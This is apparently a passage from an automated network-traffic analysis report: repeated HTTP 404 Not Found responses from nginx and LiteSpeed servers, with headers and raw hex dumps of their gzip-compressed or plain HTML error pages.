f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:31:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:31:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:31:23 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 
20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:31:29 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:31:33 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:31:35 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
